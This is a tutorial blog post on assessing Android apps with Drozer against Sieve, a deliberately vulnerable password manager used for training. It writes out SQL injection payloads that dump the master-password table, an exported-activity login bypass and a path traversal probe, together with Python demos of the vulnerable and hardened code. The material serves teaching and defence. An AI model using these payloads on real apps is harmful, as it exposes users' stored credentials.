0x00: Preface
Android apps carry plenty of application-level flaws, and those flaws often have to be assessed in a controlled way; Drozer is one of the best tools for that job. The target app here is Sieve, a deliberately insecure password manager that MWR provides as a training target for Drozer, so its own flaws serve as the test sample.
0x01: Installing Sieve
Install Sieve on the device first, set the master password and PIN it asks for, and add at least one password entry so that the password list is not empty when we query it later.
0x02: Installing Drozer
Tips: my platform is Windows, and there are several pitfalls during installation.
After downloading Drozer, go into the Drozer directory and run drozer.bat; if it starts without errors, the installation succeeded.
The downloaded Drozer folder also contains agent.apk. Install it on the phone, open it and switch on the embedded server, then forward the agent's port from the host:
adb forward tcp:31415 tcp:31415
At this point drozer console connect should drop you at the dz> prompt, but on Windows it fails unless Drozer can find the Java executables, which the next step fixes.
Solution:
Create a file named .drozer_config. Windows Explorer will not let you create a name that starts with a dot, so create 1.drozer_config first and rename it from the command prompt with ren 1.drozer_config .drozer_config. Create it in the Drozer directory as described here, or, if it is not picked up there, in your home directory (%USERPROFILE% on Windows), which is where Drozer looks for it.
Add the following lines, with the paths pointing at your own java.exe and javac.exe:
[executables]
java = f:\java\jdk1.8.0_66\bin\java.exe
javac = f:\java\jdk1.8.0_66\bin\javac.exe
With the file in place, run drozer console connect again; it now starts successfully and gives you the dz> prompt.
(If Errno 10061 or Errno 10054 appears, the console could not reach the agent on the forwarded port: check that the embedded server is switched on in the agent and that adb forward was run. See also: http://blog.csdn.net/ksr12333/article/details/39181057)
0x03: Demonstrating how Drozer assesses an app
(1) First list the installed packages:
run app.package.list -f sieve
Without -f every package on the device is listed; the -f keyword filters for the app you want to test.
Get basic information about the package (version, permissions, user ID, group ID, data directory and so on):
run app.package.info -a com.mwr.example.sieve
(2) Identify the attack surface:
run app.package.attacksurface com.mwr.example.sieve
This lists the exported activities, broadcast receivers, content providers and services, and reports that the app is debuggable, which lets us attach a debugger to the process through adb.
Start an activity directly:
run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList
PWList is the activity that shows the stored password list. Because it is exported, Drozer (or any other app on the device) can launch it directly, skipping the login screen the app would normally show first.
(3) SQL injection
SQL can be injected into the content provider through the projection and selection parameters. Probe the projection with a lone single quote:
run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "'"
The SQLite syntax error that comes back (unrecognized token) shows the quote reached the SQL parser unescaped, so the parameter is injectable. The selection parameter behaves the same way:
run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"
Since the projection is pasted directly after SELECT, it can name a different table and comment out the rest of the statement. This lists the Key table, which holds the master password and PIN:
run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Key;--"
Android recommends SQLite for storing user data, and SQLite is driven by SQL statements; but what makes the injection possible is not SQLite itself. It is that the provider builds its query by concatenating the caller-controlled projection and selection strings into the SQL text, instead of validating column names against an allow-list and binding values as parameters.
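To make the mechanism concrete, here is an added example (my own Python, not code from Sieve or from Drozer) that rebuilds a Sieve-like provider on an in-memory SQLite database: a query function that concatenates the caller's projection and selection the way the vulnerable app does, the three probes above run against it, and a hardened variant that allow-lists column names and binds the filter value as a parameter. The table layout and row contents are constructed for the demo and are assumptions about the app's schema, not its real one.

```python
import sqlite3

# Constructed schema that imitates Sieve's database for this demo; the real
# app's columns may differ. The Key table stands in for the master password/PIN.
SCHEMA = """
CREATE TABLE Passwords (
    _id INTEGER PRIMARY KEY, service TEXT, username TEXT, password BLOB, email TEXT
);
CREATE TABLE Key (Password TEXT, pin TEXT);
INSERT INTO Passwords VALUES (1, 'Gmail', 'alice', X'DEADBEEF', 'alice@example.com');
INSERT INTO Key VALUES ('MasterPass123', '1234');
"""

def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db

def vulnerable_query(db, projection="*", selection=None):
    """Mimics a provider that drops the caller-controlled --projection and
    --selection strings straight into the SQL text (no validation, no binding)."""
    sql = "SELECT " + projection + " FROM Passwords"
    if selection is not None:
        sql += " WHERE " + selection
    return db.execute(sql).fetchall()

# The drozer probes from the post, as (name, arguments for vulnerable_query).
PROBES = [
    ("projection_quote", {"projection": "'"}),              # --projection "'"
    ("selection_quote",  {"selection": "'"}),               # --selection "'"
    ("dump_key_table",   {"projection": "* FROM Key;--"}),  # --projection "* FROM Key;--"
]

def run_probes():
    """Return each probe's outcome: the rows it leaked, or the SQLite error text."""
    db = make_db()
    outcome = {}
    for name, kwargs in PROBES:
        try:
            outcome[name] = vulnerable_query(db, **kwargs)
        except sqlite3.OperationalError as err:
            outcome[name] = "error: " + str(err)
    return outcome

ALLOWED_COLUMNS = ("_id", "service", "username", "password", "email")

def hardened_query(db, projection=None, filter_column=None, filter_value=None):
    """Allow-list column names (identifiers cannot be bound as parameters) and
    bind the filter value with '?', so neither argument can change the SQL structure."""
    columns = tuple(projection) if projection else ALLOWED_COLUMNS
    unknown = [c for c in columns if c not in ALLOWED_COLUMNS]
    if unknown:
        raise ValueError("unknown column(s) in projection: %r" % unknown)
    sql = "SELECT " + ", ".join(columns) + " FROM Passwords"
    args = ()
    if filter_column is not None:
        if filter_column not in ALLOWED_COLUMNS:
            raise ValueError("unknown filter column: %r" % filter_column)
        sql += " WHERE " + filter_column + " = ?"
        args = (filter_value,)
    return db.execute(sql, args).fetchall()

def hardened_rejects(projection):
    """True if the hardened query refuses the given projection list."""
    try:
        hardened_query(make_db(), projection)
        return False
    except ValueError:
        return True

if __name__ == "__main__":
    for name, result in run_probes().items():
        print(name, "->", result)
    print("hardened:", hardened_query(make_db(), ["service", "username"], "service", "Gmail"))
    print("hardened rejects injection:", hardened_rejects(["* FROM Key;--"]))
```

The two quote probes fail with an SQLite parse error, exactly the signal drozer shows, and the third returns the Key row even though the URI pointed at Passwords; the hardened version rejects the same payload before any SQL is built.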
(4) Get information from the content providers
run app.provider.info -a com.mwr.example.sieve
This shows each content provider's details, including any read/write permissions and path permissions protecting it.
Find the providers' content URIs (data disclosure):
run scanner.provider.finduris -a com.mwr.example.sieve
Then query one of them to see the actual records:
run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical
The stored entries come back, including the service, username, e-mail and the encrypted password field, with no authentication required.
(5) Detect directory traversal vulnerabilities
run scanner.provider.traversal -a com.mwr.example.sieve
The scanner reads a path made of ../ segments followed by a well-known system file through every provider URI that supports file access, and reports the URIs that return a file from outside the app's own directory.
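What the scanner is testing for, as an added example in Python that is my own and not code from Sieve or from Drozer: a stand-in for a provider's openFile() that joins the caller's URI path onto the app's files directory without normalising it, a hardened version that canonicalises the path and refuses anything that resolves outside that directory, and a probe that does what scanner.provider.traversal does: prepend enough ../ segments to climb to the filesystem root, then walk down to a file whose content is known. The sandbox directory and the "hosts" marker file are constructed for the demo, and POSIX paths are assumed.

```python
import os
import tempfile

# Added demo, not Sieve's or Drozer's code. POSIX paths are assumed.

def vulnerable_open(root, uri_path):
    """Provider-style openFile() that trusts the URI path: '../' walks out of root."""
    with open(os.path.join(root, uri_path), "rb") as f:
        return f.read()

def hardened_open(root, uri_path):
    """Same, but canonicalise first and refuse anything that lands outside root."""
    root_real = os.path.realpath(root)
    target = os.path.realpath(os.path.join(root_real, uri_path))
    if os.path.commonpath([root_real, target]) != root_real:
        raise PermissionError("path escapes provider root: " + uri_path)
    with open(target, "rb") as f:
        return f.read()

MARKER_CONTENT = b"127.0.0.1 localhost\n"  # constructed stand-in for /etc/hosts

def make_sandbox():
    """Build an app-like files directory plus a 'system' file outside it (constructed data)."""
    base = tempfile.mkdtemp(prefix="sieve-demo-")
    root = os.path.join(base, "files")
    os.makedirs(root)
    with open(os.path.join(root, "backup.db"), "wb") as f:
        f.write(b"legit provider file")
    marker = os.path.join(base, "hosts")
    with open(marker, "wb") as f:
        f.write(MARKER_CONTENT)
    return root, marker

def traversal_probe(open_fn, root, marker, depth=16):
    """Mimic scanner.provider.traversal: enough '../' to reach '/', then the
    absolute path of a file whose content we know. True means the provider
    served a file from outside its root."""
    payload = "../" * depth + os.path.realpath(marker).lstrip("/")
    try:
        data = open_fn(root, payload)
    except (PermissionError, FileNotFoundError):
        return False
    return data == MARKER_CONTENT

if __name__ == "__main__":
    root, marker = make_sandbox()
    print("vulnerable provider traversable:", traversal_probe(vulnerable_open, root, marker))
    print("hardened provider traversable:  ", traversal_probe(hardened_open, root, marker))
    print("hardened still serves its own file:", hardened_open(root, "backup.db"))
```

The check must run on the canonicalised path: comparing the raw string against the root would still let ../ through, and a symlink inside the root could point outside it. Note that the probe climbs past the root with a fixed number of ../ segments rather than guessing the directory depth, which is why a generous depth works for any app.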
The above is a fairly simple demonstration of Drozer's basic usage; for more detail see the official documentation:
https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-drozer-user-guide-2015-03-23.pdf
0x04: Summary
Drozer's assessment capabilities (SQL injection detection, content provider enumeration, directory traversal detection, and extracting sensitive data through the flaws it finds) are a great help when taking apart an app, and I want to share them with everyone who is keen on Android security. If anything here is written wrong, I hope you will correct me.